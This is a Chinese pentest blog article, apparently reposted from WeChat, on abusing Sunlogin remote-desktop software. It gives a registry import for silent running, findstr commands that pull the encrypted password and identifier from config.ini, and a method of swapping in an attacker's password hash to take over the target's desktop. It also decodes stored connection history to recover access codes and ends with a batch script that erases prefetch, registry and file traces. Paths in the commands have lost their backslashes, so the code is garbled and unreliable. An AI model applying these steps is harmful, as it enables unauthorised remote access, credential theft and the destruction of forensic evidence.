|
|
0x01 向日葵简介
-
支持系统:Winodws/Linux/MacOS/Android/iOS
0x02 向日葵安装
首次执行时会出现UAC弹窗和安装界面,且不支持静默安装,所以没办法直接执行我们上传的向日葵,不过可以自己编写模拟鼠标点击程序来实现执行绿色版。
SunloginClient注册表项中有对应的版本即可实现免安装运行。可通过regedit -s命令导入以下注册表即可,注意权限问题。Windows Registry Editor Version 5.00[]"Oray_set_wizarddialog_need_show"="1""Oray_have_no_account_loged"="1""10.5.0.29613_IsRunSeted"="1""11.0.0.33826_IsRunSeted"="1"
0x03 场景1:替换目标连接密码
C:ProgramDataOraySunloginClient默认路径下生成config.ini配置文件,也可以通过以下命令获取其他安装路径,这个文件存储着我们需要的fastcode:本机识别码,encry_pwd:本机验证码,密文无法直接解密。findstr /si /n encry_pwd= c:config.inifindstr /si /n fastcode= c:config.inifindstr /si /n fastcodehistroy= c:config.ini
encry_pwd密文内容替换为我们本机验证码密文,低版本可以设置“自定义验证码”,然后上传覆盖至目标机器,接着使用目标识别码和本地验证码进行连接即可进入目标远程桌面。
0x04 场景2:获取历史连接记录
fastcodehistroy值以base64编码形式存储着向日葵历史连接记录,可以直接通过解码得知所有历史连接记录的识别码和验证码。
0x05 可能需要清理的向日葵痕迹
@echo offtaskkill /f /im SunloginClient.exedel /s /q C:WindowsPrefetchSUNLOGINCLIENT*.pfdel /s /q %userprofile%AppDataRoamingMicrosoftWindowsRecentSunloginClient*.lnkrmdir /s /q C:ProgramDataOraySunloginClientrmdir /s /q %userprofile%AppDataRoamingOraySunloginClientreg delete "HKCUSoftwareOraySunLoginSunloginClient" /freg delete "HKLMSOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRun" /v SunloginClient /fdel /s /q SunloginClient.exe[...SNIP...]
推 荐 阅 读
欢 迎 私 下 骚 扰
本文始发于微信公众号(潇湘信安):向日葵软件在渗透测试中的应用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论